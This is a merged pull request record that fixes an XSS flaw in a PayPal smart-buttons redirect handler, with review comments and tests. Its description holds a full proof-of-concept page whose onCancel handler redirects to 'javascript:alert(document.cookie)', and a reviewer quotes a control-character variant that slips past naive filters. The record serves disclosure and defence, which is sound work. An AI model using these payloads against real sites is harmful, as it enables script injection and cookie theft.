### PR TITLE
Check for javascript in redirect urls

### PR DESCRIPTION
**Pull request by nikrom17**
### Description

The onCancel event in the paypal.com/smart/buttons button component allows redirection to an attacker-controlled URL, including a javascript: protocol URL, which allows an attacker to execute any JS they want.

### Why are we making these changes? Include references to any related Jira tasks or GitHub Issues

This XSS vulnerability was reported [here](https://paypal.atlassian.net/browse/LI-28951)

#### Step 1: Build zoid v10 with namespaces enabled

This step can be skipped by using the build I made in {F2866166}
Prerequisite: you must have Node.js and NPM installed to do this step.

Download the zoid library from GitHub, i.e., at https://github.com/krakenjs/zoid/archive/refs/heads/main.zip

Open a terminal/shell in the downloaded folder

Run npm install to install all the dependencies

Modify the globals.js in the root of the project as follows:
```
{{diff
module.exports = {
 _POST_ROBOT_: {
   ...postRobotGlobals._POST_ROBOT_,
   _AUTO_SETUP_: false,
+   _SCRIPT_NAMESPACE_: true,
 },
 _ZOID_: {
   _VERSION_: `${formatVersion(pkg.version)}`,
   _GLOBAL_KEY: `zoid${formatVersion(pkg.version)}__`,
   _IFRAME_SUPPORT_: true,
   _POPUP_SUPPORT_: true,
   _FRAMEWORK_SUPPORT_: false,
   _DEFAULT_CONTAINER_: true,
   _DEFAULT_PRERENDER_: true,
+   _SCRIPT_NAMESPACE_: true,
 },
};
}}
```

Build the library by running `npm run webpack`

You should now have the library built at dist/zoid.min.js. Copy this file for the next step.

####  Step 2: Building the page and zoid component
Leverage [doc-examples](https://github.com/paypal-examples/docs-examples) repo to replicate issue locally. Modify contents of `standard-integration/client/checkout.html` below

```
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Button XSS</title>

    <style>
      #button-container {
        text-align: left;
        border-collapse: collapse;
        white-space: nowrap;
        font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
        text-transform: none;
        font-weight: 500;
        font-size: 0;
        user-select: none;
        cursor: default;
        box-sizing: border-box;
        height: 45px;
        vertical-align: top;
        min-height: 30px;
        max-height: 55px;
        margin-bottom: 14px;
      }

      button {
        border-collapse: collapse;
        white-space: nowrap;
        font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
        text-transform: none;
        font-weight: 500;
        font-size: 0;
        user-select: none;
        position: relative;
        width: 100%;
        box-sizing: border-box;
        border: none;
        vertical-align: top;
        cursor: pointer;
        overflow: hidden;
        display: inline-block;
        text-align: center;
        height: 100%;
        color: #2c2e2f;
        background: #ffc439;
        border-radius: 4px;
        cursor: pointer;
        max-width: 400px;
      }

      button:hover {
        filter: brightness(0.95);
      }

      button:disabled {
        opacity: 0.5;
        cursor: default;
      }

      button img {
        border-collapse: collapse;
        white-space: nowrap;
        font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
        text-transform: none;
        font-weight: 500;
        font-size: 0;
        color: #2c2e2f;
        user-select: none;
        box-sizing: border-box;
        cursor: pointer;
        padding: 0;
        display: inline-block;
        background: none;
        border: none;
        width: auto;
        vertical-align: middle;
        height: 100%;
        text-align: left;
      }

      button > div {
        border-collapse: collapse;
        white-space: nowrap;
        font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
        text-transform: none;
        font-weight: 500;
        font-size: 0;
        text-align: center;
        color: #2c2e2f;
        user-select: none;
        box-sizing: border-box;
        cursor: pointer;
        position: relative;
        margin: 0px 4vw;
        height: 22px;
      }

      button > div > div {
        position: absolute;
        top: -10px;
        left: 50%;
        transform: translateX(-50%);
        color: red;
        font-size: 8pt;
      }

      p {
        font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
        max-width: 300px;
        text-align: center;
      }

      .warn {
        color: red;
        font-weight: bold;
      }

      #container {
        max-width: 750px;
        margin: 0 auto;
        display: flex;
        align-items: center;
        justify-content: center;
        flex-direction: column;
        height: 100%;
        padding-left: 15px;
        padding-right: 15px;
      }

      body,
      html {
        height: 100%;
        padding: 0;
        margin: 0;
      }

      pre {
        width: 100%;
        border: 1px solid #ddd;
        padding: 5px;
        white-space: break-spaces;
      }
    </style>
  </head>
  <body>
    <div id="container">
      <p class="warn">
        This website is a demo for a PayPal XSS. After clicking the button
        below, and the button in the popup, the XSS will be executed.
      </p>

      <div id="button-container">
        <button>
          <div>
            <img
              src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMTAxcHgiIGhlaWdodD0iMzIiIHZpZXdCb3g9IjAgMCAxMDEgMzIiIHByZXNlcnZlQXNwZWN0UmF0aW89InhNaW5ZTWluIG1lZXQiIHhtbG5zPSJodHRwOiYjeDJGOyYjeDJGO3d3dy53My5vcmcmI3gyRjsyMDAwJiN4MkY7c3ZnIj48cGF0aCBmaWxsPSIjMDAzMDg3IiBkPSJNIDEyLjIzNyAyLjggTCA0LjQzNyAyLjggQyAzLjkzNyAyLjggMy40MzcgMy4yIDMuMzM3IDMuNyBMIDAuMjM3IDIzLjcgQyAwLjEzNyAyNC4xIDAuNDM3IDI0LjQgMC44MzcgMjQuNCBMIDQuNTM3IDI0LjQgQyA1LjAzNyAyNC40IDUuNTM3IDI0IDUuNjM3IDIzLjUgTCA2LjQzNyAxOC4xIEMgNi41MzcgMTcuNiA2LjkzNyAxNy4yIDcuNTM3IDE3LjIgTCAxMC4wMzcgMTcuMiBDIDE1LjEzNyAxNy4yIDE4LjEzNyAxNC43IDE4LjkzNyA5LjggQyAxOS4yMzcgNy43IDE4LjkzNyA2IDE3LjkzNyA0LjggQyAxNi44MzcgMy41IDE0LjgzNyAyLjggMTIuMjM3IDIuOCBaIE0gMTMuMTM3IDEwLjEgQyAxMi43MzcgMTIuOSAxMC41MzcgMTIuOSA4LjUzNyAxMi45IEwgNy4zMzcgMTIuOSBMIDguMTM3IDcuNyBDIDguMTM3IDcuNCA4LjQzNyA3LjIgOC43MzcgNy4yIEwgOS4yMzcgNy4yIEMgMTAuNjM3IDcuMiAxMS45MzcgNy4yIDEyLjYzNyA4IEMgMTMuMTM3IDguNCAxMy4zMzcgOS4xIDEzLjEzNyAxMC4xIFoiPjwvcGF0aD48cGF0aCBmaWxsPSIjMDAzMDg3IiBkPSJNIDM1LjQzNyAxMCBMIDMxLjczNyAxMCBDIDMxLjQzNyAxMCAzMS4xMzcgMTAuMiAzMS4xMzcgMTAuNSBMIDMwLjkzNyAxMS41IEwgMzAuNjM3IDExLjEgQyAyOS44MzcgOS45IDI4LjAzNyA5LjUgMjYuMjM3IDkuNSBDIDIyLjEzNyA5LjUgMTguNjM3IDEyLjYgMTcuOTM3IDE3IEMgMTcuNTM3IDE5LjIgMTguMDM3IDIxLjMgMTkuMzM3IDIyLjcgQyAyMC40MzcgMjQgMjIuMTM3IDI0LjYgMjQuMDM3IDI0LjYgQyAyNy4zMzcgMjQuNiAyOS4yMzcgMjIuNSAyOS4yMzcgMjIuNSBMIDI5LjAzNyAyMy41IEMgMjguOTM3IDIzLjkgMjkuMjM3IDI0LjMgMjkuNjM3IDI0LjMgTCAzMy4wMzcgMjQuMyBDIDMzLjUzNyAyNC4zIDM0LjAzNyAyMy45IDM0LjEzNyAyMy40IEwgMzYuMTM3IDEwLjYgQyAzNi4yMzcgMTAuNCAzNS44MzcgMTAgMzUuNDM3IDEwIFogTSAzMC4zMzcgMTcuMiBDIDI5LjkzNyAxOS4zIDI4LjMzNyAyMC44IDI2LjEzNyAyMC44IEMgMjUuMDM3IDIwLjggMjQuMjM3IDIwLjUgMjMuNjM3IDE5LjggQyAyMy4wMzcgMTkuMSAyMi44MzcgMTguMiAyMy4wMzcgMTcuMiBDIDIzLjMzNyAxNS4xIDI1LjEzNyAxMy42IDI3LjIzNyAxMy42IEMgMjguMzM3IDEzLjYgMjkuMTM3IDE0IDI5LjczNyAxNC42IEMgMzAuMjM3IDE1LjMgMzAuNDM3IDE2LjIgMzAuMzM3IDE3LjIgWiI+PC9wYXRoPjxwYXRoIGZpbGw9IiMwMDMwODciIGQ9Ik0gNTUuMzM3IDEwIEwgNTEuNjM3IDEwIEMgNTEuMjM3IDEwIDUwLjkzNyAxMC4yIDUwLjczNyAxMC41IEwgNDUuNTM3IDE4LjEgTCA0My4zMzcgMTAuOCBDIDQzLjIzNyAxMC4zIDQyLjczNyAxMCA0Mi4zMzcgMTAgTCAzOC42MzcgMTAgQyAzOC4yMzcgMTAgMzcuODM3IDEwLjQgMzguMDM3IDEwLjkgTCA0Mi4xMzcgMjMgTCAzOC4yMzcgMjguNCBDIDM3LjkzNyAyOC44IDM4LjIzNyAyOS40IDM4LjczNyAyOS40IEwgNDIuNDM3IDI5LjQgQyA0Mi44MzcgMjkuNCA0My4xMzcgMjkuMiA0My4zMzcgMjguOSBMIDU1LjgzNyAxMC45IEMgNTYuMTM3IDEwLjYgNTUuODM3IDEwIDU1LjMzNyAxMCBaIj48L3BhdGg+PHBhdGggZmlsbD0iIzAwOWNkZSIgZD0iTSA2Ny43MzcgMi44IEwgNTkuOTM3IDIuOCBDIDU5LjQzNyAyLjggNTguOTM3IDMuMiA1OC44MzcgMy43IEwgNTUuNzM3IDIzLjYgQyA1NS42MzcgMjQgNTUuOTM3IDI0LjMgNTYuMzM3IDI0LjMgTCA2MC4zMzcgMjQuMyBDIDYwLjczNyAyNC4zIDYxLjAzNyAyNCA2MS4wMzcgMjMuNyBMIDYxLjkzNyAxOCBDIDYyLjAzNyAxNy41IDYyLjQzNyAxNy4xIDYzLjAzNyAxNy4xIEwgNjUuNTM3IDE3LjEgQyA3MC42MzcgMTcuMSA3My42MzcgMTQuNiA3NC40MzcgOS43IEMgNzQuNzM3IDcuNiA3NC40MzcgNS45IDczLjQzNyA0LjcgQyA3Mi4yMzcgMy41IDcwLjMzNyAyLjggNjcuNzM3IDIuOCBaIE0gNjguNjM3IDEwLjEgQyA2OC4yMzcgMTIuOSA2Ni4wMzcgMTIuOSA2NC4wMzcgMTIuOSBMIDYyLjgzNyAxMi45IEwgNjMuNjM3IDcuNyBDIDYzLjYzNyA3LjQgNjMuOTM3IDcuMiA2NC4yMzcgNy4yIEwgNjQuNzM3IDcuMiBDIDY2LjEzNyA3LjIgNjcuNDM3IDcuMiA2OC4xMzcgOCBDIDY4LjYzNyA4LjQgNjguNzM3IDkuMSA2OC42MzcgMTAuMSBaIj48L3BhdGg+PHBhdGggZmlsbD0iIzAwOWNkZSIgZD0iTSA5MC45MzcgMTAgTCA4Ny4yMzcgMTAgQyA4Ni45MzcgMTAgODYuNjM3IDEwLjIgODYuNjM3IDEwLjUgTCA4Ni40MzcgMTEuNSBMIDg2LjEzNyAxMS4xIEMgODUuMzM3IDkuOSA4My41MzcgOS41IDgxLjczNyA5LjUgQyA3Ny42MzcgOS41IDc0LjEzNyAxMi42IDczLjQzNyAxNyBDIDczLjAzNyAxOS4yIDczLjUzNyAyMS4zIDc0LjgzNyAyMi43IEMgNzUuOTM3IDI0IDc3LjYzNyAyNC42IDc5LjUzNyAyNC42IEMgODIuODM3IDI0LjYgODQuNzM3IDIyLjUgODQuNzM3IDIyLjUgTCA4NC41MzcgMjMuNSBDIDg0LjQzNyAyMy45IDg0LjczNyAyNC4zIDg1LjEzNyAyNC4zIEwgODguNTM3IDI0LjMgQyA4OS4wMzcgMjQuMyA4OS41MzcgMjMuOSA4OS42MzcgMjMuNCBMIDkxLjYzNyAxMC42IEMgOTEuNjM3IDEwLjQgOTEuMzM3IDEwIDkwLjkzNyAxMCBaIE0gODUuNzM3IDE3LjIgQyA4NS4zMzcgMTkuMyA4My43MzcgMjAuOCA4MS41MzcgMjAuOCBDIDgwLjQzNyAyMC44IDc5LjYzNyAyMC41IDc5LjAzNyAxOS44IEMgNzguNDM3IDE5LjEgNzguMjM3IDE4LjIgNzguNDM3IDE3LjIgQyA3OC43MzcgMTUuMSA4MC41MzcgMTMuNiA4Mi42MzcgMTMuNiBDIDgzLjczNyAxMy42IDg0LjUzNyAxNCA4NS4xMzcgMTQuNiBDIDg1LjczNyAxNS4zIDg1LjkzNyAxNi4yIDg1LjczNyAxNy4yIFoiPjwvcGF0aD48cGF0aCBmaWxsPSIjMDA5Y2RlIiBkPSJNIDk1LjMzNyAzLjMgTCA5Mi4xMzcgMjMuNiBDIDkyLjAzNyAyNCA5Mi4zMzcgMjQuMyA5Mi43MzcgMjQuMyBMIDk1LjkzNyAyNC4zIEMgOTYuNDM3IDI0LjMgOTYuOTM3IDIzLjkgOTcuMDM3IDIzLjQgTCAxMDAuMjM3IDMuNSBDIDEwMC4zMzcgMy4xIDEwMC4wMzcgMi44IDk5LjYzNyAyLjggTCA5Ni4wMzcgMi44IEMgOTUuNjM3IDIuOCA5NS40MzcgMyA5NS4zMzcgMy4zIFoiPjwvcGF0aD48L3N2Zz4"
              data-v-b01da731=""
              alt=""
              aria-label="PayPal"
            />
            <div>trigger xss</div>
          </div>
        </button>
      </div>
    </div>

    <div id="container_tmp"></div>

    <script
      data-uid="uid_uqfvkyfjlprhlhuismnvtnhvqejrfv"
      src="https://jolle.io/CyjlBS2DRJHL8jBfqpOj9qubheP-ygfP0CAioCcndjU/zoid.min.js"
    ></script>
    <script>
      const clientID = "alc_client1";
      const sdkMeta = btoa(
        JSON.stringify({
          url:
            "https://localhost.paypal.com:8443/sdk/js?client-id=" +
            clientID +
            "&currency=USD",
          attrs: { "data-uid": "uid_uqfvkyfjlprhlhuismnvtnhvqejrfv" },
        })
      );

      var ButtonComponent = zoid.create({
        tag: "paypal-buttons",
        url:
          "https://localhost.paypal.com:8443/smart/buttons?env=production&clientID=" +
          clientID +
          "&sdkMeta=" +
          sdkMeta,
        dimensions: {
          width: "400px",
          height: "200px",
        },
      });

      const component = ButtonComponent({
        onCancel: (_, actions) => {
          // actual XSS here!
          actions.redirect("javascript:alert(document.cookie)//://");
        },

        // This will cancel the checkout flow immediately after the user clicks
        // the button inside the popup, triggering the onCancel handler above.
        getPopupBridge: () => ({ start: () => ({ opType: "cancel" }) }),

        // Rest of these are to make the app actually load and work properly,
        // but are not directly related to the exploit.
        intent: "capture",
        locale: { lang: "en", country: "US" },
        style: {},
        clientID,
        createOrder: () => Promise.resolve("X"),
      });

      document
        .querySelector("button")
        .addEventListener("click", () =>
          component.render("#container_tmp", "popup")
        );
    </script>
  </body>
</html>
```

#### Step 3: Victim
As a victim, open the file crafted in the previous step. Click the button. Then, click the button within the popup. You should be prompted with your cookies.

❤️ Thank you!

### CODE REVIEW

File: src/props/utils.js [hunk 1]
```diff
@@ -1,7 +1,33 @@
...
+  if (url.indexOf("://") === -1) {
+    getLogger().warn("redir_url_non_scheme", { url }).flush();
+    throw new Error(
+      `Invalid redirect url: ${url} - must be fully qualified url`,
+    );
+  } else if (!url.match(/^https?:\/\//)) {
+    getLogger().warn("redir_url_non_http", { url }).flush();
+
+    if (/^javascript:/i.test(url)) {
+      getLogger().warn("redir_url_has_javascript", { url }).flush();
```
Comment (nikrom17) [inline src/props/utils.js:27]: Does anyone have a preference on the content of this warning?

File: src/props/utils.js [hunk 2]
```diff
@@ -1,7 +1,33 @@
...
+      throw new Error(`Don't run javascript!!!`);
```
Comment (nikrom17) [inline src/props/utils.js:28]: Does anyone have a preference on the content of this error message?

File: src/props/utils.js [hunk 3]
```diff
@@ -1,7 +1,33 @@
...
+
+  if (url.indexOf("://") === -1) {
+    getLogger().warn("redir_url_non_scheme", { url }).flush();
+    throw new Error(
+      `Invalid redirect url: ${url} - must be fully qualified url`,
+    );
+  } else if (!url.match(/^https?:\/\//)) {
+    getLogger().warn("redir_url_non_http", { url }).flush();
+
+    if (/^javascript:/i.test(url)) {
```
Comment (jshawl) [inline src/props/utils.js:26]: I once saw an xss report where control characters would still run: `'\nj\t\ravascript:alert("xss!")'`

so I ended up doing something like this:

```js
if (url.toLowerCase().replace(/[^a-z:]+/g,'').match(/^javascript:/)) {
```

File: src/props/onComplete.js [hunk 4]
```diff
@@ -65,23 +66,6 @@ type GetOnCompleteOptions = {|
...
-    throw new Error(
-      `Invalid redirect url: ${url} - must be fully qualified url`,
-    );
-  } else if (!url.match(/^https?:\/\//)) {
-    getLogger().warn("redir_url_non_http", { url }).flush();
-  }
-
-  return redir(url, window.top);
-};
-
```
Comment (jshawl) [inline src/props/onComplete.js:84]: nice cleanup!!! 👏

File: src/props/utils.js (hunk 2 above)
Comment (jshawl) [reply src/props/utils.js:28]: The earlier error could work here, too! `Invalid redirect url: ${url} - must be fully qualified url`

**Review by jshawl — APPROVED** [review]
Nice, Nik! I think adding support for the control characters would be good here and maybe a test showing that an error will be thrown, but otherwise looks great! feel free to rerequest review if you'd like another!

File: src/props/utils.js (hunk 3 above)
Comment (nikrom17) [reply src/props/utils.js]: Thanks for sharing this [PR](https://github.paypal.com/Checkout/xo-buttonjs/pull/166/files) for reference.

File: src/props/utils.js [hunk 5]
```diff
@@ -1,7 +1,40 @@
...
+import { ZalgoPromise } from "@krakenjs/zalgo-promise/src";
+
+import { getLogger } from "../lib";
 
 export const checkUlsatNotRequired = (
   paymentSource: $Values<typeof FUNDING> | null,
   buyerAccessToken: ?string,
 ): boolean => paymentSource === FUNDING.VENMO && !buyerAccessToken;
+
+export const redirect = (url: string): ZalgoPromise<void> => {
```
Comment (wsbrunson) [inline src/props/utils.js:13]: probably good to create some unit tests for this

**Review by wsbrunson — APPROVED** [review]

File: src/props/utils.test.js [hunk 6]
```diff
@@ -0,0 +1,54 @@
...
+  getLogger: vi.fn(() => logger),
+}));
+
+describe("redirect", () => {
+  it("should redirect a valid url", () => {
+    redirect("https://www.paypal.com");
+
+    expect(getLogger).toBeCalledTimes(0);
+
+    expect.assertions(1);
```
Comment (wsbrunson) [inline src/props/utils.test.js:25]: we should check that `redirect` from belter was called

if we can, we should avoid relying on logger calls and instead check whether the function threw an error or we ultimately called the redirect function

Comment (nikrom17) [reply src/props/utils.test.js]: good call, I've added an assertion for the redirect function as well.

**Review by wsbrunson — APPROVED** [review]

**Pull request merged**